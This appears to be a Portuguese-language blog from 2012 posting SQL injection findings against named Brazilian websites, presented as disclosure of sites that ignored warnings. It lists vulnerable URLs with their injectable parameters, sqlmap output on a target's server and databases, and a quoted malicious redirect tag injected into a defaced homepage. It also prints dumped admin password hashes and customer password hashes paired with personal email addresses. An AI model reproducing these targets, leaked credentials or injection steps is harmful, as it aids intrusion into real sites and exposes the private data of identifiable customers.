segunda-feira, 23 de abril de 2012

SQLi www.paratotal.com.br (foram alertados)

Alertei esses caras faz algum tempo e até postei no meu twitter (http://www.paratotal.com.br/?pg=local&id=41 / http://pastebin.com/rHr5FcmF), infelizmente esses caras não estão nem ai.

Hoje dia 23/04/2012 fui entrar no site para ver se a URL ainda estava vulnerável olha o que encontrei:




Foi injetado um redirecionamento na página principal do portal:

<meta HTTP-EQUIV="REFRESH" content="0; url=http://anonymous.anonh4.hostei.com/">


segunda-feira, 9 de abril de 2012

SQLi >> frutasexoticas.com.br

SQL Injection:

http://www.frutasexoticas.com.br/site/materia.php?id=160

frutasbr
+
+
++++ logar
nome senha nivel
cascel cbf063f3ff846676bc7b8f40344e65cb 1
marlene e10adc3949ba59abbe56e057f20f883e 2
+
+
++++ customers
customers_password                 customers_email_address
000116a2b67a20f112d23b24a42299da:71 ademir@sottozero.com.br
0004dccc02366a7e0b5c8ad700185dc5:5c jfagundes013@terra.com.br
0050d476b2e5fd04e816bdd349c32bc5:d5 adrianogabriel@gmail.com
005ea9414ef628ab08be942e5400c7ba:17 marilonjesusmaia@yahoo.com.br
005ed1d0eaeec64dd7bd07dd85f8a86e:e6 arnaldomoschetto@gmail.com

SQLi >> www.abam.com.br


SQL Injection:
URL: http://www.abam.com.br/includes/menu3/noticias_imp.php?id=36

sqlmap:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL >= 5.0.0


available databases [2]:
[*] abam
[*] information_schema